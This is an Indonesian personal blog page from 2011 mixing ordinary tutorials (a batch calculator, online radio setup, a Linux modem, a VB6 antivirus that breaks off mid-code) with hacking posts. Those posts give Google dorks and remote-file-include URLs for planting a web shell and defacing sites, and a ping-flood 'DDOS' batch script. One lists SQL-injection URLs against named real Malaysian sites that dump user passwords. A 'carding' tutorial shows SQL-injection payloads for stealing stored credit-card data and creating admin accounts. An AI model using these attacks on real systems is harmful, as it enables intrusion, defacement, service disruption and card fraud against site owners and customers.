Trending Topic

Buku tamu

Posted by agus darlis On Selasa, 06 Desember 2011 0 komentar
Buku tamu sengaja saya taruh disini supaya mengurangi berat dari loading karena blog agus-darlis.blogspot.com dalam perubahan bentuk :D ingin melihat komentar anda silahkan tekan F5





READ MORE

Cara Membuat Kalkulator dengan Dos berextensi . bat

Posted by agus darlis On Senin, 28 November 2011 0 komentar
@echo off
title Kalkulator by : agusdarlis
:ulang
echo Mari berhitung...!!
set /p A=Masukkan Nilai A =
set /p B=Masukkan Nilai B =
set /p o=Pilih pengoperasian (*, +, -, /) =
set /a "jumlah" = A%o%B
echo Jumlah = %jumlah%
pause>null
goto ulang
======================================
READ MORE

Cara Mudah Deface Web Via RFI

Posted by agus darlis On Minggu, 27 November 2011 0 komentar

Nah apa itu RFI, RFI adalah ( Remote File Include ) :
RFI adalah adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server .. !!!
Kenapa bisa terjadi RFI :
Dalam bahasa pemrograman PHP terdapat bugs PHP yang salah satunya adalah RFI .. !!!
if(!$_GET['p']
$p="main";
$p=$_GET['p'];
Nah dari codingan di atas kenapa bisa terjadi bugs RFI , udah dulu penjelasan nya kapan mulai nya :D yuk kita mulai bagaimana cara mudah deface web pakai RFI
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di milworm nah berhubung milworm udah gak ada lagi :D heheh cari ndiri deh yak hahah males muter-muter dari google karna koneksi berat 
Setelah anda berhasil nemu RFI ntah itu di situs apa sekarang kita cari DORK nya di google oneadmin site:.com / oneadmin site:com nah seperti ini contoh nya ntar http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject] yang berikut nya untuk PnPhpBB2 pasti belum pernah kan kalian para pembaca deface ini, tapi kalau buat para sesepuh pro haram di maklumi karna penulis masih pemula :D
nah jika ingin deface PnPPhpBB2 kita cari lagi DORK nya di google contoh nya modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki nih contoh setelah kalian berhasil mencari DORK pada google http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject] berikut contoh lagi hehehe banyak amat contoh nya http://www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject] 
Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya.. setelah semua nya berhasil bikin deh file yang berextensi index.html atau cari lagi di google script deface pasti nemu karna google baik kog :D setelah nemu upload file kalian ke direct nya setelah berhasil di upload liat website nya taraaaaaaaaaaaa ada nama kalian di sana :D hehehehehehe good luck buat kalian

READ MORE

cara membuat radio online

Posted by agus darlis On Selasa, 22 November 2011 1 komentar
Cara Praktis Membuat Radio Online SendiriAnda sudah pernah mendengar radio online? Saya harap anda menjawab "YA" saya sudah pernah. Karena bagaimana mungkin anda akan mempraktekkan tutorial saya kali ini jika belum pernah mendengar radio secara live streaming atau yang biasa disebut radio online. Jika belum, silakan coba mendengarka radio online saya yang ada di main menu pada halaman utama blog ini, atau langsung saja klik di sini.

Tidak itu saja, silakan anda benar benar mendengar radio online tersebut, atau jika radio online di daerah anda juga memiliki live streaming nya silakan dengarkan dan bandingkan dengan radio versi konfensionalnya. Jika anda tidak tahu silakan klik di sini dan ketik kata kunci dengan nama stasiun radio daerah anda.

Pada tahap ini anda sudah pernah, dan sudah mengerti perbedaan radio online dan radio konfensional. Dan sekarang tinggal mempelajari cara membuatnya saja. Untuk penjelasannya sudah saya bahas pada artikel sebelumnya. Jika anda belum pernah membacanya silakan klik di sini.

Nah berikut cara membuat radio online sendiri:

Software yang harus anda persiapkan:

Winamp, jika belum ada silakan [download]

Sebenarnya tidak hanya Winamp yang bisa dijadikan sebagai pemutar musiknya, namun untuk pemula lebih baik menggunakan cara yang lebih mudah dulu, yaitu menggunakan software yang tidak asing lagi seperti Winamp ini.

Shoutcast DSP, klik [download]

Shoutcast DSP adalah plug in yang berguna sebagai jalur / jalan musik dari Winamp ke server.

Silakan download dan instal dulu kedua software tersebut! Jangan jalankan winamp saat proses instalasi Soutcast DSP.

Menyiapkan server

Sekarang proses instalasi software telah selesai, kita hanya membutuhkan server yang bisa dibuat sendiri, di sewa, dan yang ada yang di sewakan secara gratis. Untuk kali ini kita coba dengan yang gratis.

Daftar di sini
Isi semua data dengan benar 
Setelah proses pendaftaran selesai, sekarang login ke akun anda. Klik tombol "Login here to get your server details".
Setelah masuk klik My Account 
Copy Semua data yang ada (Server IP / Host, Server Port, Password) ke Notepad
Setelah itu klik Restart seperti pada gambar no. 4

Buka Winamp
Klik Options --> Preferences seperti pada gambar.
Lalu Plugins --> DSP / Effect --> klik Noullsoft SHOUTcast Source DSP
Lalu isikan data - data yang tadi di copy di Notepad ke Output seperti pada gambar.
*Setting Nama Radio, Website, dll pada Yellowpages (tidak wajib)
Lalu sitting encorder kemudian Settingan ini bisa sesuai yang diinginkan

*Encorder type AAC kualitasnya lebih bagus dari pada MP3

*AAC hanya dapat didengar melalui Winamp (setahu saya)

*MP3 dapat didengar melalui Winamp, WMP, ithune, Real player, BlackBerry, iPhone, dll (media apa saja)
Terakhir kembali ke Outpun dan klik Connect
Radio anda sudah dapat di dengar oleh pengguna internet dimana saja.
Silakan coba putar lagu, tunggu beberapa saat (+- 1 menit) dan dengar di komputer lain.

Jika ingin ngobrol (dengan suara kita) klik input, pilih soundcard input, dan centang Microphone.

Cara mendengarkan: contoh pada Winamp

Klik File --> Play URL --> masukkan URL berikut: (contohnya radio saya) s6.myradiostream.com:12788
Klik open
Selesai

*Namun jika langsung didengarkan pada winamp tidak akan bisa karena layanan gratis ini menghasuskan pendengar untuk membuka halaman yang ada iklan adsense mereka dulu baru radio dapat didengarkan

*Cara yang paling mudah adalah dengan membuka halaman dengan URL / IP yang kamu dapat /port.htm sehingga contohnya seperti ini: http://radio.anaski.net:8000/listen.pls

*Jika kamu memiliki blog / website ada cara yang lebih mudah lagi. Silakan klik di sini.

Selamat mencoba, Jangan lupa tinggalkan komentarnya ya.... Kalau sudah di coba tinggalkan juga URL radionya biar saya juga bisa mencoba mendengarkan radio sobat.
semoga sobat pembaca semua bisa terbantu nah sekarang saya lagi online memutar kan lagu koleksi saya paramore :D
READ MORE

Script deface

Posted by agus darlis On 3 komentar
Lagi suntuk mau postingan apaan yak lagi, nah kebetulan tadi nih saat para zombie sedang berperang ada salah satu zombie minta script wajah ane alias index deface :D heheheh , nah gak usah sungkan rakitan teman ama ane nih link nya SEDOT bagi yang bingung bagaimana sih cara buat script deface seperti tampilan web yang di ambil alih oleh para zombie dunia underground nah tinggal sedot deh tu gak boleh lama-lama ntar saya hapus :D kalau mau password untuk mendownload silahkan hubungi saya di SINI

Nah berikut adalah contoh hasil dari teman saya lihat gambar di bawah ini
READ MORE

Indonesia vs malaysia

Posted by agus darlis On Senin, 21 November 2011 0 komentar
Akhirnya selesai pertandingan indonesia melawan malaysia wah tapi untuk saya gak nonton ya ujung-ujung nya kalah eeiittsss tapi bukan berarti saya menghina negara tercinta yaitu INDONESIA nah kali ini saya akan memposting indonesia vs malaysia tapi bukan dari dunia nyata saya akan memposting ini tentang perang cyber indonesia :D hahahah, nah loh kog bisa ya bisa dong MALAYSIA nah akibat kekalahan team INDONESIA tepat di tengah malam ini para zombie mulai berkeliaran mencari situs malaysia :D kalau saya malas lagi asik setting radio online :D nanti aja deh , INDONESIA TETAP SATU DI HATI RAKYAT berikut adalah hasil dari para zombie yang telah menggigit situs-situs MALAYSIA thank's semua zombie bawah tanah 
http://www.smm.net.my/new%20html/smm-news-details.php?id=85

http://www.instun.gov.my/index.php?option=com_newsfeeds&view=newsfeed&catid=6%3Arelated-projects&id=12%3Aplanet-mysql&lang=en

http://www.smkayan.bpi.edu.my/guru/index.php?view=newsfeed&catid=6%3Arelated-projects&id=12-planet-mysql&option=com_newsfeeds&Itemid=49

http://www.babygear.com.my/news/news_detail.php?id=-5+union+all+select+1

http://www.mukmin.com.my/baca.php?id=-43+union+all+select+concat_ws%280x3a%2Cid%2Cnama%2Cusername%2Cpassword%2Clevel%29%2C2+from+members--

http://kcom.net.my/index.php?p=askthis&file=%2Findex.php%3Fp%3Dannouncements-detail%26fid%3D-1%2Bunion%2Ball%2Bselect%2B1%2Cconcat_ws%280x3a%2CId%2CFullName%2CUsername%2CEmail%2CPassword%2CLastModified%2CRoleId%2CStatus%2520%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Bfrom%2Btuser

http://www.people-source.com.my/jobdetails.php?id=-87+%2F*!union*/+all+/*!select*/
+1,unhex%28hex%28version%28%29%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://www.pennzoil.com.my/products.php?categoryid=-1%27%2F**/union/**/all/**/select/**/
1,2,3,4,5,group_concat%28username,0x3a,password,0x3a,email,0x3a,status

http://www.edsoo.com.my/index.php?sc=our_services&id=1%2F**/AND/**/1=0/**/UNION/**/ALL/
**/SELECT/**/1,/**/CONCAT%28@@VERSION,0x3a,DATABASE%28%29,0x3a,USER%28%29%29,/**/3,/**/@@DATADIR,/**/5,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13--

http://www.yellowpages.com.my/search_gov.jsp?gov=-999.9+UNION+ALL+SELECT

http://www.malaysianbar.org.my/index.php?option=com_docman&task=cat_view&gid=160&Itemid=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536
--
READ MORE

membuat DDOS attack dari notepad

Posted by agus darlis On 0 komentar
terkadang para newbie bingung bagaimana sih cara menggunakan DDOS attack nah sekarang gak perlu susah susah dan bingung gimana sih cara bikin atau nyerang menggunakan teknik DDOS, sebelum nya penulis bertanya-tanya kepada para sesepuh PRO :D ciee hahahah nah berikut script pembuatan DDOS attack menggunakan notepad
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With agusdarlis
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:D DOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
jangan lupa save dengan nama DDOS.bat :D semoga bermanfaat untuk belajar bagi para newbie :D
READ MORE

Cara install modem pada linux suse 11.3

Posted by agus darlis On Minggu, 20 November 2011 0 komentar
Bingung mau buat postingan apaan kebetulan mau berexperimen membuat 2 OS waw sesuatu :D oh tidak itu sudah biasa bagi yang pandai hihihih, nah saat jalan-jalan antara blog ke blog terus saya liat ada tutorial bagaimana cara menginstall modem di linux suse 11.3 terutama KDE atau GNOME waw kog bisa
ya bisa lah nih contoh nya

agusdarlis:/home/agusdarlis # lsusb
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 12d1:1003 Huawei Technologies Co., Ltd. E220 HSDPA Modem / E270 HSDPA/HSUPA Modem
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 002: ID 046d:c045 Logitech, Inc. Optical Mouse
agusdarlis:/home/agusdarlis # dmesg | grep modem
[   73.732516] USB Serial support registered for GSM modem (1-port)
[   73.732557] option 1-2:1.0: GSM modem (1-port) converter detected
[   73.732760] usb 1-2: GSM modem (1-port) converter now attached to ttyUSB0
[   73.732775] option 1-2:1.1: GSM modem (1-port) converter detected
[   73.732891] usb 1-2: GSM modem (1-port) converter now attached to ttyUSB1
[   73.732980] option: v0.7.2:USB Driver for GSM modems
agusdarlis:/home/agusdarlis #
karena saya menggunakan KDE desktop walau sempat bingung, dengan memperhatikan tutorial yang ada akhirnya berhasil
nah nih liat hasil nya di bawah ini
agusdarlis:/home/agusdarlis # ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1B:38:C3:1F:29
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:66 errors:0 dropped:0 overruns:0 frame:0
TX packets:66 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4676 (4.5 Kb)  TX bytes:4676 (4.5 Kb)

ppp0      Link encap:Point-to-Point Protocol
inet addr:10.41.83.46  P-t-P:10.64.64.64  Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
RX packets:14 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:484 (484.0 b)  TX bytes:387 (387.0 b)
agusdarlis:/home/agusdarlis # ping google.co.id
PING google.co.id (66.249.89.99) 56(84) bytes of data.
64 bytes from nrt04s01-in-f99.1e100.net (66.249.89.99): icmp_seq=1 ttl=49 time=219 ms
64 bytes from nrt04s01-in-f99.1e100.net (66.249.89.99): icmp_seq=2 ttl=49 time=237 ms 
 
semoga bermanfaat bagi sesama 
READ MORE

Backtrack Hacking DVD Tutorials – Mediafire (MF) & Megaupload (MU)

Posted by agus darlis On Selasa, 08 November 2011 2 komentar


Backtrack Hacking DVD Tutorials (Full DVD) Bonus Hacking Video [HuntR][PDU]
24 Episode
Size: 6.330 GB
INFO: Here
Mediafire
Keep Broken files while unraring -if found- “MF issue”
http://www.mediafire.com/?0f3b45n1005jbo5
http://www.mediafire.com/?1kg4ueuuju1usfb
http://www.mediafire.com/?1liach64enmpxwr
http://www.mediafire.com/?2g880uyw18rjjf7
http://www.mediafire.com/?3uueolnh505zlep
http://www.mediafire.com/?4dgvapxb936pxdx
http://www.mediafire.com/?4nm6btiw7tmpqu3
http://www.mediafire.com/?4waa3lyd3nrn5am
http://www.mediafire.com/?783ecbcd97szm5b
http://www.mediafire.com/?84r42h7w4skvsmh
http://www.mediafire.com/?9jhhzhw1q2b9hjc
http://www.mediafire.com/?9m72jjxjmc0sgq9
http://www.mediafire.com/?9qs5aqavk54atvn
http://www.mediafire.com/?a3aqyfxcengxsp1
http://www.mediafire.com/?bc9takuzyu43fcd
http://www.mediafire.com/?cz3aint9zajma32
http://www.mediafire.com/?eq525sgm3rcllb3
http://www.mediafire.com/?j0iu2qu2bfa7nop
http://www.mediafire.com/?j64txqqf5lin6qv
http://www.mediafire.com/?nyaw2ur5pju432j
http://www.mediafire.com/?ook6091d29l3sm9
http://www.mediafire.com/?p7j64fd67af48yz
http://www.mediafire.com/?pa8dxnamg34ae48
http://www.mediafire.com/?quhmj92m8ej9d5q
http://www.mediafire.com/?rbmz6z3561kb9hn
http://www.mediafire.com/?rdaifc051661766
http://www.mediafire.com/?u658uue8wvke326
http://www.mediafire.com/?v1gmp2l69sejpci
http://www.mediafire.com/?xsdregggffeghr2
http://www.mediafire.com/?xw1bi1b57ak816i
http://www.mediafire.com/?yk5du5nrhx1g1ag
http://www.mediafire.com/?yrr8z17pw545bg7
http://www.mediafire.com/?z51myvc3n182ala
Megaupload
http://www.megaupload.com/?d=1SY7Z6XJ
http://www.megaupload.com/?d=2F6FZRJR
http://www.megaupload.com/?d=2HAWJNQT
http://www.megaupload.com/?d=3UEZRDBL
http://www.megaupload.com/?d=4TLJW5PK
http://www.megaupload.com/?d=726NLN94
http://www.megaupload.com/?d=8MUT0PNN
http://www.megaupload.com/?d=8VOW136U
http://www.megaupload.com/?d=A8XNQAE1
http://www.megaupload.com/?d=AUBQBQGX
http://www.megaupload.com/?d=CLTEAW0P
http://www.megaupload.com/?d=CMX8YUY9
http://www.megaupload.com/?d=D7VNPKF3
http://www.megaupload.com/?d=IPVVIEXD
http://www.megaupload.com/?d=JLRBT9QR
http://www.megaupload.com/?d=JNT9VMC1
http://www.megaupload.com/?d=KJLWQPML
http://www.megaupload.com/?d=M8F0XOB9
http://www.megaupload.com/?d=MQELBH4C
http://www.megaupload.com/?d=N0MDLU22
http://www.megaupload.com/?d=O2NL4E5L
http://www.megaupload.com/?d=QU1JX817
http://www.megaupload.com/?d=RQIIHCMC
http://www.megaupload.com/?d=SKGA5H8Z
http://www.megaupload.com/?d=SQ6I0DS6
http://www.megaupload.com/?d=TB9XBNF3
http://www.megaupload.com/?d=TF2ZNJXO
http://www.megaupload.com/?d=VHVJ6Y84
http://www.megaupload.com/?d=W01QRUW0
http://www.megaupload.com/?d=W8WQSJ9I
http://www.megaupload.com/?d=XG4SVX9A
http://www.megaupload.com/?d=YIGNP259
http://www.megaupload.com/?d=ZW9ZTAEO
sumber maklumat: http://www.scenedowns.com/tutorials/27452/
READ MORE

Tutorial Carding lengkap

Posted by agus darlis On 0 komentar
 Tutor Carding Lengkap  tetep tutor lama. maklum aja saya kan
anak cupu dan sangat tidak di sukai oleh teman-teman saya :D ..jadi adanya tutor lama.
walaupun sedikit yang penting berbagi
Contoh bugs pada bentuk toko sistem :
PDshopro
Ketik keyword google.com :
allinurl:/shop/category.asp/catid=
Contoh :
http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx
dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati
file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan
merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces
Contoh bugs pada bentuk toko sistem :
commerceSQL
Ketik keyword google.com :
allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti
dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya:
http://www.Target.com/cgi-bin/commercesq....cgi?page
Untuk melihat adminconfig
http://www.Target.com/cgi-bin/commercesql/index.cgi?pa ge=../admin/admin_conf.pl
Untuk melihat adminmanager
http://www.Target.com/cgi-bin/commercesql/index.cgi?p age=../admin/manager.cgi
Untuk melihat filelog/CCnya
http://www.Target.com/cgi-bin/commercesql/index.cgi ?page=../admin/files/order.log
Contoh bugs pada bentuk toko sistem :
Cart32 v3.5a
Ketik keyword google.com :
allinurl:/cart32.exe/
Contoh:
http://www.Target.net/wrburns_s/cgi-bin/...e/NoItemFo und
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg
keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di
bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and
Directory Kalau dibagian
tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb.
terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau
semuanya ke notepad atau
program text editor lainnya.
Ganti string url tsb. menjadi seperti
ini :http://www/.
Target.net/wrburns_s/cgi-bin/cart32/
Nah. ., paste satu per satu, file .c32 ke
akhir url yg sudah
dimodifikasi tadi, denganformat
http://www.Target.com/cart32/
Contoh
http://w/ ww.Target.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c 32
Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com :
allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string
berikut di akhir bagian
shopdisplayproducts.asp
Contoh:
http://Target.com/vpasp/shopdisplayproducts.asp?cat qwerty'%20union%20select%20fldauto,fldpassword%20from%2 0tbluser%20where%20fldusername='admin'%20and%20fldpassw ord%20like%20'a%25'--

Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan
informasi username dan password admin
Untuk login admin ke
http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik -->
allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin
baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into
tbluser (fldusername)values
('')--&SubCategory=&hide=&action.x=46&action.y= 6
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Keyword=&category=3); update tbluser set
fldaccess='1'where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Jangan lupa untuk mengganti dan nya
terserah kamu.
Untuk mengganti password admin, masukkan
keyword berikut :
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername='admin'--&SubCategory=All&action.x=3 3&action.y=6
Untuk login admin, ada di
http://Target/vpasp/shopadmin.asp
semoga ini bermanfaat bagi para pemula dan saya ucapkan terimakasih juga kepada anggota cyber pekanbaru, selalu berjaya semua
READ MORE

Bagaimana Internet telah membuat saya “Xlangkah Lebih Maju

Posted by agus darlis On Jumat, 04 November 2011 0 komentar
Postingan ini memang dibuat untuk mengikuti lomba dari XL, temanya seperti judul diatas.
Masih segar rasanya inget dulu berdecak kagum lihat orang pakai handphone, pengen punya komputer desktop sampai kebawa mimpi, diketawain satu kelas karena belum bisa bikin e-mail. Kenal internet itu baru SMA, itupun hanya sebatas buat nyari gambar atau bahan buat bikin tugas dari guru. Dulu diajarin sama guru IPS tentang kebutuhan primer yaitu sandang pangan papan, sekarang harus ditambah deh kayaknya, sandang pangan papan HP internet hahahah, ya begitu lah perkembangan zaman sekarang serba canggih dapat merubah segala nya dengan waktu yang singkat tidak perlu repot repot lagi melakukan segala hal termasuk dunia internet yang semakin merajalela di jagat dunia :D hebat ya, gak perlu beli bacaan di toko buku tinggal searcing aja hahahah belajar jadi hemat dan cepat walau penulis udah tamat sekolah dan gak kuliah 


Terus dimananya yang XLangkah Lebih Maju? ya gaya hidupnya, cara berpikirnya, cara memandang hidup, dan juga penulis akhirnya sadar kalau internet bisa jadi media promosi yang bagus, digabung dengan hobi penulis yaitu jalan-jalan dan dunia cyber eiittss hanya untuk pembelajaran loh gak cyber crime loh, banyak hal yang XLangkah Lebih Maju dari terdahulu yang gak tau apa apa

Sekian Bagaimana Internet Telah Membuat Saya XLangkah Lebih Maju :D keep blogging

READ MORE

CARA MEMBUAT ANTIVIRUS DENGAN VISUAL BASIC 6

Posted by agus darlis On Senin, 31 Oktober 2011 0 komentar


1.Buka program microsoft visual basic 6.0 -> Standard EXE -> OK maka akan tampil form baru sesuai dengan gambar di bawah,desain form sesuai keinginan anda



Beri nama form tersebut : frmUtama

2.Setelah form selesai di rubah namanya tambahkan component Mscomctl.Ocx dengan cara
Klik Project -> Components -> Microsoft Windows Common Controls 6.0 -> lalu klik OK
Contoh seperti gambar di bawah




3.Setelah component sukses di tambahkan langkah selanjutnya adalah menambah Command Button,Textbox,Listview,Picture Box
disini saya menggunakan desain yang sangat sederhana,desain bisa anda rubah sendiri sesuai kreatifitas anda ^^

- Tambahkan Listview kedalam form dan beri nama lvScan



yang saya lingkari merah adalah listview yang telah di tambahkan ke dalam form.

setelah itu setting listview dengan cara
Klik Listview -> Disebelah kanan bawah ada kotak properties -> Custom
lalu ikuti settingan seperti pada gambar di bawah ini


Lalu pada tab Column Headers klik insert column
- Column 1 beri nama : Virus Name
- Column 2 beri nama : Path
- Column 3 beri nama : Checksum Virus
- Column 4 beri nama : Status Virus
lalu klik Ok

Tambahkan picture box buat picture box itu sekecil mungkin dan beri nama sIcon
Setting :
Appearance : Flat
Auto Redraw : True
Border Style : None
Visible : False

Tambahkan Textbox ke dalam form dengan nama txtPath
Setting :
Appearance : Flat
Border Style : None

Tambahkan Command Button dengan nama cmdBrowse di samping Textbox yang telah di buat tadi
Setting :
Caption : ...

Masukan Code ini ke dalam cmdBrowse

Spoiler
Code:
Dim Pathnya As String
Pathnya = ""
Pathnya = BrowseFolder("Pilih folder yang akan di Scan:", Me)
If Pathnya <> "" Then
txtPath.Text = Pathnya
End If

Code di atas berfungsi untuk membuka kotak dialog yang berisi path" yang ada di dalam komputer lalu mencetaknya ke dalam textbox yang bernama txtPath

Tambahkan label dengan nama default
Setting :
Caption : Dir Scanned

Tambahkan label dengan nama lblDirScan
Setting :
Caption : 0

Tambahkan label dengan nama default
Setting :
Caption : Detected

Tambahkan label dengan nama lblFileDet
Setting :
Caption : 0

Tambahkan label dengan nama default
Setting :
Caption : File Scanned

Tambahkan label dengan nama lblFileScan
Setting :
Caption : 0

Tambahkan Textbox dengan nama txtFileScan
Setting :
Multiline : True
Scroll Bar : 2-Vertical

Tambahkan Command Button dengan nama cmdScan
Setting :
Caption : &Scan

Spoiler
'Code:
If cmdScan.Caption = "Scan" Then
Pathnya = txtPath.Text
If Mid(Pathnya, 2, 1) <> ":" Or Pathnya = "" Then
MsgBox "Direktori Tidak Ditemukan", vbCritical, "Error"
Exit Sub
Else
lvScan.Enabled = False
cmdEnable False, False, False
clear_log
cmdScan.Caption = "Stop"
StopScan = False
FindFilesEx txtPath.Text, CBool(chkSubDir.Value)
MsgBox "Scan finished !" & vbNewLine & vbNewLine & "Total Dir Scanned = " & lblDirScan.Caption & _
vbNewLine & "Total File Scanned = " & lblFileScan.Caption & vbNewLine & "Total File Detected = " & lblFileDet.Caption, vbInformation, "Finish"
If lblFileDet.Caption <> "0" Then
cmdEnable True, True, True
Else
cmdEnable False, False, True
End If
lvScan.Enabled = True
cmdScan.Caption = "Scan"
End If
Else
cmdScan.Caption = "Scan"
StopScan = True
End If


fungsi kode di atas adalah untuk memulai scan pada antivirus

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Delete

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Quarantine

Tambahkan Command Button dengan nama cmdViewQ
Setting :
Caption : &View Quarantine File

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Delete

Tambahkan kode ini di dalamnya

Spoiler
'Code:
Dim DftrFile As String
DftrFile = GetSelected(lvScan)
If DftrFile = "" Then
MsgBox "No Detected File(s) Selected", vbCritical, ""
Exit Sub
End If
Select Case Index
Case 0
clean = Action(DftrFile, lvScan, "D")
MsgBox clean & " File(s) has been deleted"
Case 1
clean = Action(DftrFile, lvScan, "Q")
MsgBox clean & " File(s) has been quarantine"
End Select


Fungsi di atas adalah fungsi untuk menghapus/mengkarantina file yang terdeteksi

Tambahkan Command Button dengan nama cmdAction
Setting :
Caption : &Quarantine

Tambahkan Command Button dengan nama cmdViewQ
Setting :
Caption : &View Quarantine File

Lalu masukan code ini ke dalamnya
Spoiler
Me.hide
frmquarantine.show


Code di atas berfungsi untuk memunculkan form quarantine dan meng enabled form utama

nah selesai untuk memasukan control ke dalam formnya
contoh form yang telah selesai.



lalu klik kanan pada form masukan kode di bawah ini

Spoiler
/Code:
Private Sub lvScan_ItemCheck(ByVal Item As MSComctlLib.ListItem)
UnSelect lvScan, "Di Karantina"
UnSelect lvScan, "Di Hapus"
End Sub

Private Function cmdEnable(hapus As Boolean, Quarantine As Boolean, openQuarantine As Boolean)
cmdAction(0).Enabled = hapus
cmdAction(1).Enabled = Quarantine
cmdViewQ.Enabled = openQuarantine
End Function

Private Function clear_log()
lblDirScan.Caption = 0
lblFileScan.Caption = 0
lblFileDet.Caption = 0
lvScan.ListItems.Clear
jumlahDir = 0
jumlahFile = 0
jumlahVirus = 0
End Function


lalu di Form_load() masukan kode ini
Spoiler
'Code:
On Error Resume Next
MkDir "Quarantine"
BuildDatabase


Lalu buatlah 1 module dengan nama modAPI

Lalu tambahkan code di bawah ini
Spoiler
'Code:
Public Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
